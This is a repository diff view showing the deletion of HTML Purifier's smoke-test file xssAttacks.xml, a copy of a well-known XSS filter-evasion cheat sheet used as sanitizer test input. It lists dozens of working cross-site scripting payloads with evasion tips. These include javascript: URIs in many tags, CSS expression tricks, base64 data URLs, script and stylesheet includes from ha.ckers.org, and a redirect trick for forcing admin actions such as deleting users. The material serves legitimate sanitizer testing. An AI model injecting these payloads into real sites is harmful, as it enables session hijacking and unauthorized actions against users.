diff options
Diffstat (limited to '3rdparty/htmlpurifier/smoketests/xssAttacks.xml')
| -rw-r--r-- | 3rdparty/htmlpurifier/smoketests/xssAttacks.xml | 1307 |
1 files changed, 0 insertions, 1307 deletions
diff --git a/3rdparty/htmlpurifier/smoketests/xssAttacks.xml b/3rdparty/htmlpurifier/smoketests/xssAttacks.xml deleted file mode 100644 index d90f4575f..000000000 --- a/3rdparty/htmlpurifier/smoketests/xssAttacks.xml +++ /dev/null @@ -1,1307 +0,0 @@ -<?xml version="1.0"?>
-<xss>
- <attack>
- <name>XSS Locator</name>
- <code>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}</code>
-
- <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc>
- <label>Basic XSS Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>XSS Quick Test</name>
- <code>'';!--"<XSS>=&{()}</code>
- <desc>If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable.</desc>
-
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>SCRIPT w/Alert()</name>
- <code><SCRIPT>alert('XSS')</SCRIPT></code>
- <desc>Basic injection attack</desc>
-
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>SCRIPT w/Source File</name>
- <code><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code>
- <desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
- <label>Basic XSS Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>SCRIPT w/Char Code</name>
- <code><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>
- <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up.</desc>
-
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>BASE</name>
- <code><BASE HREF="javascript:alert('XSS');//"></code>
- <desc>Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>BGSOUND</name>
- <code><BGSOUND SRC="javascript:alert('XSS');"></code>
- <desc>BGSOUND</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>BODY background-image</name>
- <code><BODY BACKGROUND="javascript:alert('XSS');"></code>
- <desc>BODY image</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>BODY ONLOAD</name>
- <code><BODY ONLOAD=alert('XSS')></code>
- <desc>BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>DIV background-image 1</name>
- <code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code>
- <desc>Div background-image</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>DIV background-image 2</name>
- <code><DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"></code>
- <desc>Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>DIV expression</name>
- <code><DIV STYLE="width: expression(alert('XSS'));"></code>
- <desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression"</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>FRAME</name>
- <code><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></code>
- <desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>IFRAME</name>
- <code><IFRAME SRC="javascript:alert('XSS');"></IFRAME></code>
- <desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>INPUT Image</name>
- <code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></code>
- <desc>INPUT Image</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
-
- <attack>
- <name>IMG w/JavaScript Directive</name>
- <code><IMG SRC="javascript:alert('XSS');"></code>
- <desc>Image XSS using the JavaScript directive.</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>IMG No Quotes/Semicolon</name>
- <code><IMG SRC=javascript:alert('XSS')></code>
- <desc>No quotes and no semicolon</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>IMG Dynsrc</name>
- <code><IMG DYNSRC="javascript:alert('XSS');"></code>
- <desc>IMG Dynsrc</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>IMG Lowsrc</name>
- <code><IMG LOWSRC="javascript:alert('XSS');"></code>
- <desc>IMG Lowsrc</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>IMG Embedded commands 1</name>
- <code><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></code>
- <desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>IMG Embedded commands 2</name>
- <code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</code>
- <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>IMG STYLE w/expression</name>
- <code>exp/*<XSS STYLE='no\xss:noxss("*//*");
-xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></code>
-
- <desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>List-style-image</name>
- <code><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</code>
-
- <desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>IMG w/VBscript</name>
- <code><IMG SRC='vbscript:msgbox("XSS")'></code>
- <desc>VBscript in an image</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>LAYER</name>
- <code><LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER></code>
- <desc>Layer (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
-
- </attack>
- <attack>
- <name>Livescript</name>
- <code><IMG SRC="livescript:[code]"></code>
- <desc>Livescript (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
-
- </attack>
- <attack>
- <name>US-ASCII encoding</name>
- <code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
- <desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>]</browser>
-
- </attack>
- <attack>
- <name>META</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></code>
- <desc>The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>META w/data:URL</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code>
- <desc>This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>META w/additional URL parameter</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></code>
- <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>Mocha</name>
- <code><IMG SRC="mocha:[code]"></code>
- <desc>Mocha (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
-
- </attack>
- <attack>
- <name>OBJECT</name>
- <code><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></code>
- <desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>OBJECT w/Embedded XSS</name>
- <code><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT></code>
- <desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Embed Flash</name>
- <code><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></code>
-
- <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>OBJECT w/Flash 2</name>
- <code>a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);</code>
-
- <desc>Using this action script inside flash can obfuscate your XSS vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>STYLE</name>
- <code><STYLE TYPE="text/javascript">alert('XSS');</STYLE></code>
- <desc>STYLE tag (Older versions of Netscape only)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
-
- </attack>
- <attack>
- <name>STYLE w/Comment</name>
- <code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></code>
- <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>STYLE w/Anonymous HTML</name>
- <code><XSS STYLE="xss:expression(alert('XSS'))"></code>
- <desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>STYLE w/background-image</name>
- <code><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></code>
-
- <desc>STYLE tag using background-image.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>STYLE w/background</name>
- <code><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code>
-
- <desc>STYLE tag using background.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>Stylesheet</name>
- <code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code>
- <desc>Stylesheet</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>Remote Stylesheet 1</name>
- <code><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></code>
- <desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>Remote Stylesheet 2</name>
- <code><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></code>
- <desc>Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>Remote Stylesheet 3</name>
- <code><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></code>
- <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>Remote Stylesheet 4</name>
- <code><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></code>
- <desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>TABLE</name>
- <code><TABLE BACKGROUND="javascript:alert('XSS')"></TABLE></code>
- <desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>TD</name>
- <code><TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE></code>
- <desc>TD background.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>XML namespace</name>
- <code><HTML xmlns:xss>
-<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
-<xss:xss>XSS</xss:xss>
-
-</HTML></code>
- <desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
-
- </attack>
- <attack>
- <name>XML data island w/CDATA</name>
- <code><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
-
-</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></code>
- <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
- <label>HTML Element Attacks</label>
- |